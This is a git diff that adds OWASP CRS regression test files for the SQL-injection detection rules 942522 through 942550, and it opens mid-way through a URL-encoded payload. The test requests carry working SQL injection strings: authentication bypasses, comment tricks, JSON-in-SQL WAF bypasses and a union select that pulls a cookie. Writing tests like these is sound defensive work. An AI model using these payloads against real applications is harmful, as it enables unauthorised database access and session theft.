susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20datab
ases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + no_log_contains: id "942522" + - test_title: 942522-9 + desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + 
version: HTTP/1.0
+ output:
+ log_contains: id "942522"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml
new file mode 100644
index 00000000..63a3993c
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml
@@ -0,0 +1,23 @@
+---
+meta:
+ author: "Franziska Bühler"
+ description: "Detects SQL query termination"
+ enabled: true
+ name: 942530.yaml
+tests:
+ - test_title: 942530-1
+ desc: "Detects SQL query termination with ';"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ data: "email=admin@juice-sh.op';&password=foo"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942530"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
new file mode 100644
index 00000000..f4b72dab
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
@@ -0,0 +1,135 @@
+---
+meta:
+ author: "karelorigin, Walter Hop"
+ description: Various Authentication bypass tests
+ enabled: true
+ name: 942540.yaml
+tests:
+ - test_title: 942540-1
+ desc: "Positive test for single quotes"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "email=admin%40juice-sh.op';"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942540"
+ - test_title: 942540-2
+ desc: "Positive test for double quotes"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "email=admin%40juice-sh.op\";"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942540"
+ - test_title: 942540-3
+ desc: "Positive test for backticks"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "email=admin%40juice-sh.op`;"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942540"
+ - test_title: 942540-4
+ desc: "False positive test CSV balanced single quotes"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "email='foo';'bar';'def'"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942540"
+ - test_title: 942540-5
+ desc: "False positive test balanced backticks"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "email=`foo`;`bar`;`def`"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942540"
+ - test_title: 942540-6
+ desc: "False positive test (markdown) mixed and balanced quotes"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Content-Type: "multipart/form-data; boundary=--------397236876"
+ method: POST
+ port: 80
+ uri: "/"
+ data: |
+ ----------397236876
+ Content-Disposition: form-data; name="document"; filename="document.md"
+ Content-Type: text/markdown
+
+ # Foo
+ my name is 'foo'; and I work on CRS.
+ # Bar
+ my name is "bar"; and I work on CRS.
+ ----------397236876--
+ output:
+ no_log_contains: id "942540"
+ - test_title: 942540-7
+ desc: "Test for bypass with comment"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942540"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml
new file mode 100644
index 00000000..f7f95467
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml
@@ -0,0 +1,673 @@
+---
+meta:
+ author: "Andrea Menin (theMiddle)"
+ description: JSON in SQL bypass technique
+ enabled: true
+ name: 942550.yaml
+tests:
+ - test_title: 942550-1
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-2
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-3
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-4
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-5
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-6
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-7
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-8
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-9
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-10
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-11
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-12
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-13
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-14
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-15
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-16
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-17
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-18
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-19
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-20
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-21
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-22
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-23
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-24
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-25
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"a":"b"}' ? 'a'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-26
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"a":"b"}' ? 'a'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-27
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '[1,2]' ? '1'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-28
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '[1,2]' ? '1'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-29
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"name":"asd"}' ?| array['a','name']
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-30
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"name":"asd"}' ?| array['a','name']
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
